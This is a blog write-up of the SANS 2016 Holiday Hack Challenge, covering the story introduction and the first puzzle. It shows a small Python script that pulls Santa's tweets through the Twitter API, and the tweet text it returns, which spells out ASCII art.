tldr; SANS released the 2016 Christmas Holiday Hack Challenge.This serves as my official submitted answer, and my offering to you dear reader in case you want to see how I approached the challenges.

So settle in this is going to be a long post. At the time of writing the challenge is still live and SANS typically keep the servers up so the historical challenges can still be played. As this is a long post you may not want to read it all, if your here looking for help or the answer to a specific challenge then use the index to jump to the specific question.

Index:

Introduction

Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.

In shock, Jessica uttered, “Someone has abducted Santa Claus!”

Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”

The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”

Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”

Questions

What is the secret message in Santa’s tweets?

From the business card we got from talking to the Dosis children we now know Santa’s social media accounts.

Taking a look at the @santawclaus feed we can see a lot of seemingly random text. It will be much easier to read if its all in one place. Twitter has an API we can use to read tweets, and a quick google shows us some really useful sample code we can adjust.

# Source: http://www.craigaddyman.com/mining-all-tweets-with-python/ from twython import Twython # pip install twython import time # standard lib ''' Go to https://apps.twitter.com/ to register your app to get your api keys ''' CONSUMER_KEY = '' CONSUMER_SECRET = '' ACCESS_KEY = '' ACCESS_SECRET = '' twitter = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET) lis = [798175529463676928] ## this is the latest starting tweet id for i in range(0, 16): ## iterate through all tweets ## tweet extract method with the last list item as the max_id user_timeline = twitter.get_user_timeline(screen_name="santawclaus", count=200, include_retweets=False, max_id=lis[-1]) with open('tweetout.txt', 'a') as out: for tweet in user_timeline: print tweet['text'] ## print the tweet lis.append(tweet['id']) ## append tweet id's out.write('{0}

'.format(tweet['text'])) time.sleep(30)

Running this outputs:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ CHRISTMASHOHOHOELFQQ...............dQ,..........>GOODWILLTOWARDSMENHOHOHOQQ GOODWILLTOWARDSMENQQL.............>QQm,........_HOHOHOHOHOHOCHRISTMASELFELF SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ CHRISTMASSANTAELFQ[........>HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE JOYELFNORTHPOLEJOYELFL..............]JOYQ;....>SANTAHOHOHONORTHPOLEELFSANTA PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ CHRISTMASHOHOHOJOYQm...............dQ,..........>GOODWILLTOWARDSMENQWSANTAQ SANTACHRISTMASSANTAQL.............>QQm,........_JOYELFGOODWILLTOWARDSMENELF HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......>HOHOHOSANTANORTHPOLEQQWQ HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ SANTAPEACEONEARTHJOY/...........................>NORTHPOLECHRISTMASHOHOHOQQ ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ 